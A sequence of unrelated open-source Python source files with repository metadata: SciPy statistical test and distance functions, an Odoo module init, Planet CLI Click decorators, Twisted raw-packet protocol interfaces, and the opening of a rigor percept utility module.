.. [1] https://en.wikipedia.org/wiki/Wilcoxon_rank-sum_test
"""
x, y = map(np.asarray, (x, y))
n1 = len(x)
n2 = len(y)
alldata = np.concatenate((x, y))
ranked = rankdata(alldata)
x = ranked[:n1]
s = np.sum(x, axis=0)
expected = n1 * (n1+n2+1) / 2.0
z = (s - expected) / np.sqrt(n1*n2*(n1+n2+1)/12.0)
prob = 2 * distributions.norm.sf(abs(z))
return RanksumsResult(z, prob)
KruskalResult = namedtuple('KruskalResult', ('statistic', 'pvalue'))
def kruskal(*args, **kwargs):
"""
Compute the Kruskal-Wallis H-test for independent samples.
The Kruskal-Wallis H-test tests the null hypothesis that the population
median of all of the groups are equal. It is a non-parametric version of
ANOVA. The test works on 2 or more independent samples, which may have
different sizes. Note that rejecting the null hypothesis does not
indicate which of the groups differs. Post hoc comparisons between
groups are required to determine which groups are different.
Parameters
----------
sample1, sample2, ... : array_like
Two or more arrays with the sample measurements can be given as
arguments.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float
The Kruskal-Wallis H statistic, corrected for ties.
pvalue : float
The p-value for the test using the assumption that H has a chi
square distribution.
See Also
--------
f_oneway : 1-way ANOVA.
mannwhitneyu : Mann-Whitney rank test on two samples.
friedmanchisquare : Friedman test for repeated measurements.
Notes
-----
Due to the assumption that H has a chi square distribution, the number
of samples in each group must not be too small. A typical rule is
that each sample must have at least 5 measurements.
References
----------
.. [1] W. H. Kruskal & W. W. Wallis, "Use of Ranks in
One-Criterion Variance Analysis", Journal of the American Statistical
Association, Vol. 47, Issue 260, pp. 583-621, 1952.
.. [2] https://en.wikipedia.org/wiki/Kruskal-Wallis_one-way_analysis_of_variance
Examples
--------
>>> from scipy import stats
>>> x = [1, 3, 5, 7, 9]
>>> y = [2, 4, 6, 8, 10]
>>> stats.kruskal(x, y)
KruskalResult(statistic=0.2727272727272734, pvalue=0.6015081344405895)
>>> x = [1, 1, 1]
>>> y = [2, 2, 2]
>>> z = [2, 2]
>>> stats.kruskal(x, y, z)
KruskalResult(statistic=7.0, pvalue=0.0301973834223185)
"""
args = list(map(np.asarray, args))
num_groups = len(args)
if num_groups < 2:
raise ValueError("Need at least two groups in stats.kruskal()")
for arg in args:
if arg.size == 0:
return KruskalResult(np.nan, np.nan)
n = np.asarray(list(map(len, args)))
if 'nan_policy' in kwargs.keys():
if kwargs['nan_policy'] not in ('propagate', 'raise', 'omit'):
raise ValueError("nan_policy must be 'propagate', "
"'raise' or'omit'")
else:
nan_policy = kwargs['nan_policy']
else:
nan_policy = 'propagate'
contains_nan = False
for arg in args:
cn = _contains_nan(arg, nan_policy)
if cn[0]:
contains_nan = True
break
if contains_nan and nan_policy == 'omit':
for a in args:
a = ma.masked_invalid(a)
return mstats_basic.kruskal(*args)
if contains_nan and nan_policy == 'propagate':
return KruskalResult(np.nan, np.nan)
alldata = np.concatenate(args)
ranked = rankdata(alldata)
ties = tiecorrect(ranked)
if ties == 0:
raise ValueError('All numbers are identical in kruskal')
# Compute sum^2/n for each group and sum
j = np.insert(np.cumsum(n), 0, 0)
ssbn = 0
for i in range(num_groups):
ssbn += _square_of_sums(ranked[j[i]:j[i+1]]) / n[i]
totaln = np.sum(n, dtype=float)
h = 12.0 / (totaln * (totaln + 1)) * ssbn - 3 * (totaln + 1)
df = num_groups - 1
h /= ties
return KruskalResult(h, distributions.chi2.sf(h, df))
FriedmanchisquareResult = namedtuple('FriedmanchisquareResult',
('statistic', 'pvalue'))
def friedmanchisquare(*args):
"""
Compute the Friedman test for repeated measurements.
The Friedman test tests the null hypothesis that repeated measurements of
the same individuals have the same distribution. It is often used
to test for consistency among measurements obtained in different ways.
For example, if two measurement techniques are used on the same set of
individuals, the Friedman test can be used to determine if the two
measurement techniques are consistent.
Parameters
----------
measurements1, measurements2, measurements3... : array_like
Arrays of measurements. All of the arrays must have the same number
of elements. At least 3 sets of measurements must be given.
Returns
-------
statistic : float
The test statistic, correcting for ties.
pvalue : float
The associated p-value assuming that the test statistic has a chi
squared distribution.
Notes
-----
Due to the assumption that the test statistic has a chi squared
distribution, the p-value is only reliable for n > 10 and more than
6 repeated measurements.
References
----------
.. [1] https://en.wikipedia.org/wiki/Friedman_test
"""
k = len(args)
if k < 3:
raise ValueError('Less than 3 levels. Friedman test not appropriate.')
n = len(args[0])
for i in range(1, k):
if len(args[i]) != n:
raise ValueError('Unequal N in friedmanchisquare. Aborting.')
# Rank data
data = np.vstack(args).T
data = data.astype(float)
for i in range(len(data)):
data[i] = rankdata(data[i])
# Handle ties
ties = 0
for i in range(len(data)):
replist, repnum = find_repeats(array(data[i]))
for t in repnum:
ties += t * (t*t - 1)
c = 1 - ties / (k*(k*k - 1)*n)
ssbn = np.sum(data.sum(axis=0)**2)
chisq = (12.0 / (k*n*(k+1)) * ssbn - 3*n*(k+1)) / c
return FriedmanchisquareResult(chisq, distributions.chi2.sf(chisq, k - 1))
BrunnerMunzelResult = namedtuple('BrunnerMunzelResult',
('statistic', 'pvalue'))
def brunnermunzel(x, y, alternative="two-sided", distribution="t",
nan_policy='propagate'):
"""
Compute the Brunner-Munzel test on samples x and y.
The Brunner-Munzel test is a nonparametric test of the null hypothesis that
when values are taken one by one from each group, the probabilities of
getting large values in both groups are equal.
Unlike the Wilcoxon-Mann-Whitney's U test, this does not require the
assumption of equivariance of two groups. Note that this does not assume
the distributions are same. This test works on two independent samples,
which may have different sizes.
Parameters
----------
x, y : array_like
Array of samples, should be one-dimensional.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided'
* 'less': one-sided
* 'greater': one-sided
distribution : {'t', 'normal'}, optional
Defines how to get the p-value.
The following options are available (default is 't'):
* 't': get the p-value by t-distribution
* 'normal': get the p-value by standard normal distribution.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float
The Brunner-Munzer W statistic.
pvalue : float
p-value assuming an t distribution. One-sided or
two-sided, depending on the choice of `alternative` and `distribution`.
See Also
--------
mannwhitneyu : Mann-Whitney rank test on two samples.
Notes
-----
Brunner and Munzel recommended to estimate the p-value by t-distribution
when the size of data is 50 or less. If the size is lower than 10, it would
be better to use permuted Brunner Munzel test (see [2]_).
References
----------
.. [1] Brunner, E. and Munzel, U. "The nonparametric Benhrens-Fisher
problem: Asymptotic theory and a small-sample approximation".
Biometrical Journal. Vol. 42(2000): 17-25.
.. [2] Neubert, K. and Brunner, E. "A studentized permutation test for the
non-parametric Behrens-Fisher problem". Computational Statistics and
Data Analysis. Vol. 51(2007): 5192-5204.
Examples
--------
>>> from scipy import stats
>>> x1 = [1,2,1,1,1,1,1,1,1,1,2,4,1,1]
>>> x2 = [3,3,4,3,1,2,3,1,1,5,4]
>>> w, p_value = stats.brunnermunzel(x1, x2)
>>> w
3.1374674823029505
>>> p_value
0.0057862086661515377
"""
x = np.asarray(x)
y = np.asarray(y)
# check both x and y
cnx, npx = _contains_nan(x, nan_policy)
cny, npy = _contains_nan(y, nan_policy)
contains_nan = cnx or cny
if npx == "omit" or npy == "omit":
nan_policy = "omit"
if contains_nan and nan_policy == "propagate":
return BrunnerMunzelResult(np.nan, np.nan)
elif contains_nan and nan_policy == "omit":
x = ma.masked_invalid(x)
y = ma.masked_invalid(y)
return mstats_basic.brunnermunzel(x, y, alternative, distribution)
nx = len(x)
ny = len(y)
if nx == 0 or ny == 0:
return BrunnerMunzelResult(np.nan, np.nan)
rankc = rankdata(np.concatenate((x, y)))
rankcx = rankc[0:nx]
rankcy = rankc[nx:nx+ny]
rankcx_mean = np.mean(rankcx)
rankcy_mean = np.mean(rankcy)
rankx = rankdata(x)
ranky = rankdata(y)
rankx_mean = np.mean(rankx)
ranky_mean = np.mean(ranky)
Sx = np.sum(np.power(rankcx - rankx - rankcx_mean + rankx_mean, 2.0))
Sx /= nx - 1
Sy = np.sum(np.power(rankcy - ranky - rankcy_mean + ranky_mean, 2.0))
Sy /= ny - 1
wbfn = nx * ny * (rankcy_mean - rankcx_mean)
wbfn /= (nx + ny) * np.sqrt(nx * Sx + ny * Sy)
if distribution == "t":
df_numer = np.power(nx * Sx + ny * Sy, 2.0)
df_denom = np.power(nx * Sx, 2.0) / (nx - 1)
df_denom += np.power(ny * Sy, 2.0) / (ny - 1)
df = df_numer / df_denom
p = distributions.t.cdf(wbfn, df)
elif distribution == "normal":
p = distributions.norm.cdf(wbfn)
else:
raise ValueError(
"distribution should be 't' or 'normal'")
if alternative == "greater":
pass
elif alternative == "less":
p = 1 - p
elif alternative == "two-sided":
p = 2 * np.min([p, 1-p])
else:
raise ValueError(
"alternative should be 'less', 'greater' or 'two-sided'")
return BrunnerMunzelResult(wbfn, p)
def combine_pvalues(pvalues, method='fisher', weights=None):
"""
Combine p-values from independent tests bearing upon the same hypothesis.
Parameters
----------
pvalues : array_like, 1-D
Array of p-values assumed to come from independent tests.
method : {'fisher', 'pearson', 'tippett', 'stouffer', 'mudholkar_george'}, optional
Name of method to use to combine p-values.
The following methods are available (default is 'fisher'):
* 'fisher': Fisher's method (Fisher's combined probability test), the
sum of the logarithm of the p-values
* 'pearson': Pearson's method (similar to Fisher's but uses sum of the
complement of the p-values inside the logarithms)
* 'tippett': Tippett's method (minimum of p-values)
* 'stouffer': Stouffer's Z-score method
* 'mudholkar_george': the difference of Fisher's and Pearson's methods
divided by 2
weights : array_like, 1-D, optional
Optional array of weights used only for Stouffer's Z-score method.
Returns
-------
statistic: float
The statistic calculated by the specified method.
pval: float
The combined p-value.
Notes
-----
Fisher's method (also known as Fisher's combined probability test) [1]_ uses
a chi-squared statistic to compute a combined p-value. The closely related
Stouffer's Z-score method [2]_ uses Z-scores rather than p-values. The
advantage of Stouffer's method is that it is straightforward to introduce
weights, which can make Stouffer's method more powerful than Fisher's
method when the p-values are from studies of different size [6]_ [7]_.
The Pearson's method uses :math:`log(1-p_i)` inside the sum whereas Fisher's
method uses :math:`log(p_i)` [4]_. For Fisher's and Pearson's method, the
sum of the logarithms is multiplied by -2 in the implementation. This
quantity has a chi-square distribution that determines the p-value. The
`mudholkar_george` method is the difference of the Fisher's and Pearson's
test statistics, each of which include the -2 factor [4]_. However, the
`mudholkar_george` method does not include these -2 factors. The test
statistic of `mudholkar_george` is the sum of logisitic random variables and
equation 3.6 in [3]_ is used to approximate the p-value based on Student's
t-distribution.
Fisher's method may be extended to combine p-values from dependent tests
[5]_. Extensions such as Brown's method and Kost's method are not currently
implemented.
.. versionadded:: 0.15.0
References
----------
.. [1] https://en.wikipedia.org/wiki/Fisher%27s_method
.. [2] https://en.wikipedia.org/wiki/Fisher%27s_method#Relation_to_Stouffer.27s_Z-score_method
.. [3] George, E. O., and G. S. Mudholkar. "On the convolution of logistic
random variables." Metrika 30.1 (1983): 1-13.
.. [4] Heard, N. and Rubin-Delanchey, P. "Choosing between methods of
combining p-values." Biometrika 105.1 (2018): 239-246.
.. [5] Whitlock, M. C. "Combining probability from independent tests: the
weighted Z-method is superior to Fisher's approach." Journal of
Evolutionary Biology 18, no. 5 (2005): 1368-1373.
.. [6] Zaykin, Dmitri V. "Optimally weighted Z-test is a powerful method
for combining probabilities in meta-analysis." Journal of
Evolutionary Biology 24, no. 8 (2011): 1836-1841.
.. [7] https://en.wikipedia.org/wiki/Extensions_of_Fisher%27s_method
"""
pvalues = np.asarray(pvalues)
if pvalues.ndim != 1:
raise ValueError("pvalues is not 1-D")
if method == 'fisher':
statistic = -2 * np.sum(np.log(pvalues))
pval = distributions.chi2.sf(statistic, 2 * len(pvalues))
elif method == 'pearson':
statistic = -2 * np.sum(np.log1p(-pvalues))
pval = distributions.chi2.sf(statistic, 2 * len(pvalues))
elif method == 'mudholkar_george':
statistic = -np.sum(np.log(pvalues)) + np.sum(np.log1p(-pvalues))
nu = 5 * len(pvalues) + 4
approx_factor = np.sqrt(nu / (nu - 2))
pval = distributions.t.sf(statistic * approx_factor, nu)
elif method == 'tippett':
statistic = np.min(pvalues)
pval = distributions.beta.sf(statistic, 1, len(pvalues))
elif method == 'stouffer':
if weights is None:
weights = np.ones_like(pvalues)
elif len(weights) != len(pvalues):
raise ValueError("pvalues and weights must be of the same size.")
weights = np.asarray(weights)
if weights.ndim != 1:
raise ValueError("weights is not 1-D")
Zi = distributions.norm.isf(pvalues)
statistic = np.dot(weights, Zi) / np.linalg.norm(weights)
pval = distributions.norm.sf(statistic)
else:
raise ValueError(
"Invalid method '%s'. Options are 'fisher', 'pearson', \
'mudholkar_george', 'tippett', 'or 'stouffer'", method)
return (statistic, pval)
#####################################
# STATISTICAL DISTANCES #
#####################################
def wasserstein_distance(u_values, v_values, u_weights=None, v_weights=None):
r"""
Compute the first Wasserstein distance between two 1D distributions.
This distance is also known as the earth mover's distance, since it can be
seen as the minimum amount of "work" required to transform :math:`u` into
:math:`v`, where "work" is measured as the amount of distribution weight
that must be moved, multiplied by the distance it has to be moved.
.. versionadded:: 1.0.0
Parameters
----------
u_values, v_values : array_like
Values observed in the (empirical) distribution.
u_weights, v_weights : array_like, optional
Weight for each value. If unspecified, each value is assigned the same
weight.
`u_weights` (resp. `v_weights`) must have the same length as
`u_values` (resp. `v_values`). If the weight sum differs from 1, it
must still be positive and finite so that the weights can be normalized
to sum to 1.
Returns
-------
distance : float
The computed distance between the distributions.
Notes
-----
The first Wasserstein distance between the distributions :math:`u` and
:math:`v` is:
.. math::
l_1 (u, v) = \inf_{\pi \in \Gamma (u, v)} \int_{\mathbb{R} \times
\mathbb{R}} |x-y| \mathrm{d} \pi (x, y)
where :math:`\Gamma (u, v)` is the set of (probability) distributions on
:math:`\mathbb{R} \times \mathbb{R}` whose marginals are :math:`u` and
:math:`v` on the first and second factors respectively.
If :math:`U` and :math:`V` are the respective CDFs of :math:`u` and
:math:`v`, this distance also equals to:
.. math::
l_1(u, v) = \int_{-\infty}^{+\infty} |U-V|
See [2]_ for a proof of the equivalence of both definitions.
The input distributions can be empirical, therefore coming from samples
whose values are effectively inputs of the function, or they can be seen as
generalized functions, in which case they are weighted sums of Dirac delta
functions located at the specified values.
References
----------
.. [1] "Wasserstein metric", https://en.wikipedia.org/wiki/Wasserstein_metric
.. [2] Ramdas, Garcia, Cuturi "On Wasserstein Two Sample Testing and Related
Families of Nonparametric Tests" (2015). :arXiv:`1509.02237`.
Examples
--------
>>> from scipy.stats import wasserstein_distance
>>> wasserstein_distance([0, 1, 3], [5, 6, 8])
5.0
>>> wasserstein_distance([0, 1], [0, 1], [3, 1], [2, 2])
0.25
>>> wasserstein_distance([3.4, 3.9, 7.5, 7.8], [4.5, 1.4],
... [1.4, 0.9, 3.1, 7.2], [3.2, 3.5])
4.0781331438047861
"""
return _cdf_distance(1, u_values, v_values, u_weights, v_weights)
def energy_distance(u_values, v_values, u_weights=None, v_weights=None):
r"""
Compute the energy distance between two 1D distributions.
.. versionadded:: 1.0.0
Parameters
----------
u_values, v_values : array_like
Values observed in the (empirical) distribution.
u_weights, v_weights : array_like, optional
Weight for each value. If unspecified, each value is assigned the same
weight.
`u_weights` (resp. `v_weights`) must have the same length as
`u_values` (resp. `v_values`). If the weight sum differs from 1, it
must still be positive and finite so that the weights can be normalized
to sum to 1.
Returns
-------
distance : float
The computed distance between the distributions.
Notes
-----
The energy distance between two distributions :math:`u` and :math:`v`, whose
respective CDFs are :math:`U` and :math:`V`, equals to:
.. math::
D(u, v) = \left( 2\mathbb E|X - Y| - \mathbb E|X - X'| -
\mathbb E|Y - Y'| \right)^{1/2}
where :math:`X` and :math:`X'` (resp. :math:`Y` and :math:`Y'`) are
independent random variables whose probability distribution is :math:`u`
(resp. :math:`v`).
As shown in [2]_, for one-dimensional real-valued variables, the energy
distance is linked to the non-distribution-free version of the Cramer-von
Mises distance:
.. math::
D(u, v) = \sqrt{2} l_2(u, v) = \left( 2 \int_{-\infty}^{+\infty} (U-V)^2
\right)^{1/2}
Note that the common Cramer-von Mises criterion uses the distribution-free
version of the distance. See [2]_ (section 2), for more details about both
versions of the distance.
The input distributions can be empirical, therefore coming from samples
whose values are effectively inputs of the function, or they can be seen as
generalized functions, in which case they are weighted sums of Dirac delta
functions located at the specified values.
References
----------
.. [1] "Energy distance", https://en.wikipedia.org/wiki/Energy_distance
.. [2] Szekely "E-statistics: The energy of statistical samples." Bowling
Green State University, Department of Mathematics and Statistics,
Technical Report 02-16 (2002).
.. [3] Rizzo, Szekely "Energy distance." Wiley Interdisciplinary Reviews:
Computational Statistics, 8(1):27-38 (2015).
.. [4] Bellemare, Danihelka, Dabney, Mohamed, Lakshminarayanan, Hoyer,
Munos "The Cramer Distance as a Solution to Biased Wasserstein
Gradients" (2017). :arXiv:`1705.10743`.
Examples
--------
>>> from scipy.stats import energy_distance
>>> energy_distance([0], [2])
2.0000000000000004
>>> energy_distance([0, 8], [0, 8], [3, 1], [2, 2])
1.0000000000000002
>>> energy_distance([0.7, 7.4, 2.4, 6.8], [1.4, 8. ],
... [2.1, 4.2, 7.4, 8. ], [7.6, 8.8])
0.88003340976158217
"""
return np.sqrt(2) * _cdf_distance(2, u_values, v_values,
u_weights, v_weights)
def _cdf_distance(p, u_values, v_values, u_weights=None, v_weights=None):
r"""
Compute, between two one-dimensional distributions :math:`u` and
:math:`v`, whose respective CDFs are :math:`U` and :math:`V`, the
statistical distance that is defined as:
.. math::
l_p(u, v) = \left( \int_{-\infty}^{+\infty} |U-V|^p \right)^{1/p}
p is a positive parameter; p = 1 gives the Wasserstein distance, p = 2
gives the energy distance.
Parameters
----------
u_values, v_values : array_like
Values observed in the (empirical) distribution.
u_weights, v_weights : array_like, optional
Weight for each value. If unspecified, each value is assigned the same
weight.
`u_weights` (resp. `v_weights`) must have the same length as
`u_values` (resp. `v_values`). If the weight sum differs from 1, it
must still be positive and finite so that the weights can be normalized
to sum to 1.
Returns
-------
distance : float
The computed distance between the distributions.
Notes
-----
The input distributions can be empirical, therefore coming from samples
whose values are effectively inputs of the function, or they can be seen as
generalized functions, in which case they are weighted sums of Dirac delta
functions located at the specified values.
References
----------
.. [1] Bellemare, Danihelka, Dabney, Mohamed, Lakshminarayanan, Hoyer,
Munos "The Cramer Distance as a Solution to Biased Wasserstein
Gradients" (2017). :arXiv:`1705.10743`.
"""
u_values, u_weights = _validate_distribution(u_values, u_weights)
v_values, v_weights = _validate_distribution(v_values, v_weights)
u_sorter = np.argsort(u_values)
v_sorter = np.argsort(v_values)
all_values = np.concatenate((u_values, v_values))
all_values.sort(kind='mergesort')
# Compute the differences between pairs of successive values of u and v.
deltas = np.diff(all_values)
# Get the respective positions of the values of u and v among the values of
# both distributions.
u_cdf_indices = u_values[u_sorter].searchsorted(all_values[:-1], 'right')
v_cdf_indices = v_values[v_sorter].searchsorted(all_values[:-1], 'right')
# Calculate the CDFs of u and v using their weights, if specified.
if u_weights is None:
u_cdf = u_cdf_indices / u_values.size
else:
u_sorted_cumweights = np.concatenate(([0],
np.cumsum(u_weights[u_sorter])))
u_cdf = u_sorted_cumweights[u_cdf_indices] / u_sorted_cumweights[-1]
if v_weights is None:
v_cdf = v_cdf_indices / v_values.size
else:
v_sorted_cumweights = np.concatenate(([0],
np.cumsum(v_weights[v_sorter])))
v_cdf = v_sorted_cumweights[v_cdf_indices] / v_sorted_cumweights[-1]
# Compute the value of the integral based on the CDFs.
# If p = 1 or p = 2, we avoid using np.power, which introduces an overhead
# of about 15%.
if p == 1:
return np.sum(np.multiply(np.abs(u_cdf - v_cdf), deltas))
if p == 2:
return np.sqrt(np.sum(np.multiply(np.square(u_cdf - v_cdf), deltas)))
return np.power(np.sum(np.multiply(np.power(np.abs(u_cdf - v_cdf), p),
deltas)), 1/p)
def _validate_distribution(values, weights):
"""
Validate the values and weights from a distribution input of `cdf_distance`
and return them as ndarray objects.
Parameters
----------
values : array_like
Values observed in the (empirical) distribution.
weights : array_like
Weight for each value.
Returns
-------
values : ndarray
Values as ndarray.
weights : ndarray
Weights as ndarray.
"""
# Validate the value array.
values = np.asarray(values, dtype=float)
if len(values) == 0:
raise ValueError("Distribution can't be empty.")
# Validate the weight array, if specified.
if weights is not None:
weights = np.asarray(weights, dtype=float)
if len(weights) != len(values):
raise ValueError('Value and weight array-likes for the same '
'empirical distribution must be of the same size.')
if np.any(weights < 0):
raise ValueError('All weights must be non-negative.')
if not 0 < np.sum(weights) < np.inf:
raise ValueError('Weight array-like sum must be positive and '
'finite. Set as None for an equal distribution of '
'weight.')
return values, weights
return values, None
#####################################
# SUPPORT FUNCTIONS #
#####################################
RepeatedResults = namedtuple('RepeatedResults', ('values', 'counts'))
def find_repeats(arr):
"""
Find repeats and repeat counts.
Parameters
----------
arr : array_like
Input array. This is cast to float64.
Returns
-------
values : ndarray
The unique values from the (flattened) input that are repeated.
counts : ndarray
Number of times the corresponding 'value' is repeated.
Notes
-----
In numpy >= 1.9 `numpy.unique` provides similar functionality. The main
difference is that `find_repeats` only returns repeated values.
Examples
--------
>>> from scipy import stats
>>> stats.find_repeats([2, 1, 2, 3, 2, 2, 5])
RepeatedResults(values=array([2.]), counts=array([4]))
>>> stats.find_repeats([[10, 20, 1, 2], [5, 5, 4, 4]])
RepeatedResults(values=array([4., 5.]), counts=array([2, 2]))
"""
# Note: always copies.
return RepeatedResults(*_find_repeats(np.array(arr, dtype=np.float64)))
def _sum_of_squares(a, axis=0):
"""
Square each element of the input array, and return the sum(s) of that.
Parameters
----------
a : array_like
Input array.
axis : int or None, optional
Axis along which to calculate. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
sum_of_squares : ndarray
The sum along the given axis for (a**2).
See Also
--------
_square_of_sums : The square(s) of the sum(s) (the opposite of
`_sum_of_squares`).
"""
a, axis = _chk_asarray(a, axis)
return np.sum(a*a, axis)
def _square_of_sums(a, axis=0):
"""
Sum elements of the input array, and return the square(s) of that sum.
Parameters
----------
a : array_like
Input array.
axis : int or None, optional
Axis along which to calculate. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
square_of_sums : float or ndarray
The square of the sum over `axis`.
See Also
--------
_sum_of_squares : The sum of squares (the opposite of `square_of_sums`).
"""
a, axis = _chk_asarray(a, axis)
s = np.sum(a, axis)
if not np.isscalar(s):
return s.astype(float) * s
else:
return float(s) * s
def rankdata(a, method='average'):
"""
Assign ranks to data, dealing with ties appropriately.
Ranks begin at 1. The `method` argument controls how ranks are assigned
to equal values. See [1]_ for further discussion of ranking methods.
Parameters
----------
a : array_like
The array of values to be ranked. The array is first flattened.
method : {'average', 'min', 'max', 'dense', 'ordinal'}, optional
The method used to assign ranks to tied elements.
The following methods are available (default is 'average'):
* 'average': The average of the ranks that would have been assigned to
all the tied values is assigned to each value.
* 'min': The minimum of the ranks that would have been assigned to all
the tied values is assigned to each value. (This is also
referred to as "competition" ranking.)
* 'max': The maximum of the ranks that would have been assigned to all
the tied values is assigned to each value.
* 'dense': Like 'min', but the rank of the next highest element is
assigned the rank immediately after those assigned to the tied
elements.
* 'ordinal': All values are given a distinct rank, corresponding to
the order that the values occur in `a`.
Returns
-------
ranks : ndarray
An array of length equal to the size of `a`, containing rank
scores.
References
----------
.. [1] "Ranking", https://en.wikipedia.org/wiki/Ranking
Examples
--------
>>> from scipy.stats import rankdata
>>> rankdata([0, 2, 3, 2])
array([ 1. , 2.5, 4. , 2.5])
>>> rankdata([0, 2, 3, 2], method='min')
array([ 1, 2, 4, 2])
>>> rankdata([0, 2, 3, 2], method='max')
array([ 1, 3, 4, 3])
>>> rankdata([0, 2, 3, 2], method='dense')
array([ 1, 2, 3, 2])
>>> rankdata([0, 2, 3, 2], method='ordinal')
array([ 1, 2, 4, 3])
"""
if method not in ('average', 'min', 'max', 'dense', 'ordinal'):
raise ValueError('unknown method "{0}"'.format(method))
arr = np.ravel(np.asarray(a))
algo = 'mergesort' if method == 'ordinal' else 'quicksort'
sorter = np.argsort(arr, kind=algo)
inv = np.empty(sorter.size, dtype=np.intp)
inv[sorter] = np.arange(sorter.size, dtype=np.intp)
if method == 'ordinal':
return inv + 1
arr = arr[sorter]
obs = np.r_[True, arr[1:] != arr[:-1]]
dense = obs.cumsum()[inv]
if method == 'dense':
return dense
# cumulative counts of each unique value
count = np.r_[np.nonzero(obs)[0], len(obs)]
if method == 'max':
return count[dense]
if method == 'min':
return count[dense - 1] + 1
# average method
return .5 * (count[dense] + count[dense - 1] + 1)
|
{
"content_hash": "f2b2df75c803adcc8858811c94449070",
"timestamp": "",
"source": "github",
"line_count": 7389,
"max_line_length": 119,
"avg_line_length": 34.7559886317499,
"alnum_prop": 0.6026860115570923,
"repo_name": "jamestwebber/scipy",
"id": "2a8d7540d6fe05beb6dbab32d85dc3ef0e15e689",
"size": "257732",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scipy/stats/stats.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4398425"
},
{
"name": "C++",
"bytes": "649746"
},
{
"name": "Dockerfile",
"bytes": "1291"
},
{
"name": "Fortran",
"bytes": "5368529"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Python",
"bytes": "12779698"
},
{
"name": "Shell",
"bytes": "538"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
}
|
import project
import company
import report
import wizard
import res_partner
import res_config
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
{
"content_hash": "8cf6e338e1e292896bfc918ca470abc5",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 65,
"avg_line_length": 20.25,
"alnum_prop": 0.8333333333333334,
"repo_name": "diogocs1/comps",
"id": "becd17f0b78d73aa89c3c61d76317867c9e9a1c7",
"size": "1141",
"binary": false,
"copies": "428",
"ref": "refs/heads/master",
"path": "web/addons/project/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "701"
},
{
"name": "CSS",
"bytes": "856533"
},
{
"name": "HTML",
"bytes": "299671"
},
{
"name": "Java",
"bytes": "620166"
},
{
"name": "JavaScript",
"bytes": "5844302"
},
{
"name": "Makefile",
"bytes": "21002"
},
{
"name": "PHP",
"bytes": "14259"
},
{
"name": "Python",
"bytes": "10647376"
},
{
"name": "Ruby",
"bytes": "220"
},
{
"name": "Shell",
"bytes": "17746"
},
{
"name": "XSLT",
"bytes": "120278"
}
],
"symlink_target": ""
}
|
"""Decorators for Click commands"""
import asyncio
from functools import wraps
import click
from planet import exceptions
# https://github.com/pallets/click/issues/85#issuecomment-503464628
def coro(func):
"""Wrap async functions so they can be run sync with Click.
Parameters:
func: a Click command function or wrapper around one.
Returns:
wrapper function
"""
@wraps(func)
def wrapper(*args, **kwargs):
return asyncio.run(func(*args, **kwargs))
return wrapper
def translate_exceptions(func):
"""Translate internal exceptions to ClickException.
Parameters:
func: a Click command function or wrapper around one.
Returns:
wrapper function
Raises:
ClickException
"""
@wraps(func)
def wrapper(*args, **kwargs):
try:
func(*args, **kwargs)
except exceptions.AuthException:
raise click.ClickException(
'Auth information does not exist or is corrupted. Initialize '
'with `planet auth init`.')
except exceptions.PlanetError as ex:
raise click.ClickException(ex)
return wrapper
|
{
"content_hash": "26133e6a9502b58a14ad8570ffada70b",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 78,
"avg_line_length": 22.78846153846154,
"alnum_prop": 0.640506329113924,
"repo_name": "planetlabs/planet-client-python",
"id": "f25cadc89818116108b434977bbcadce524bc231",
"size": "1764",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "planet/cli/cmds.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "373344"
},
{
"name": "Shell",
"bytes": "936"
}
],
"symlink_target": ""
}
|
"""Interface definitions for working with raw packets"""
from twisted.internet import protocol
from zope.interface import Interface
class IRawDatagramProtocol(Interface):
"""An interface for protocols such as UDP, ICMP and TCP."""
def addProto():
"""
Add a protocol on top of this one.
"""
def datagramReceived():
"""
An IP datagram has been received. Parse and process it.
"""
class IRawPacketProtocol(Interface):
"""An interface for low-level protocols such as IP and ARP."""
def addProto():
"""
Add a protocol on top of this one.
"""
def datagramReceived():
"""
An IP datagram has been received. Parse and process it.
"""
|
{
"content_hash": "1d936fae519e085b24a2f35d59636408",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 66,
"avg_line_length": 25.066666666666666,
"alnum_prop": 0.6143617021276596,
"repo_name": "nlloyd/SubliminalCollaborator",
"id": "0d3875bae3ca84cdf2c89f4eece8ed181d462e93",
"size": "828",
"binary": false,
"copies": "35",
"ref": "refs/heads/master",
"path": "libs/twisted/pair/raw.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "510300"
},
{
"name": "Puppet",
"bytes": "6275"
},
{
"name": "Python",
"bytes": "10991491"
},
{
"name": "Shell",
"bytes": "2433"
}
],
"symlink_target": ""
}
|
""" Various utilities for dealing with percept data """
from rigor.s3 import DefaultS3Client
from rigor.types import Percept
try:
import cv2
import numpy as np
_kImageReadFlags = cv2.CV_LOAD_IMAGE_UNCHANGED
except ImportError:
pass
from urlparse import urlsplit
import urllib2
import contextlib
import os
class PerceptOps(object):
"""
Various utilities for dealing with percept data
:param config: configuration data
:type config: :py:class:`~rigor.config.RigorConfiguration`
"""
def __init__(self, config):
self._config = config
def fetch(self, percept):
"""
Given a percept, this will fetch its data from the repository, returning it as an open file-like object with a :py:func:`contextlib.closing` wrapper
